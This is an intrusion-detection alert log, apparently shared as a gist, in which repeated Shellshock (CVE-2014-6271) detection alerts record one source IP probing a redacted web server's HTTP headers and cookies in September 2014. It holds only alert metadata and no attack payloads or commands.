{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment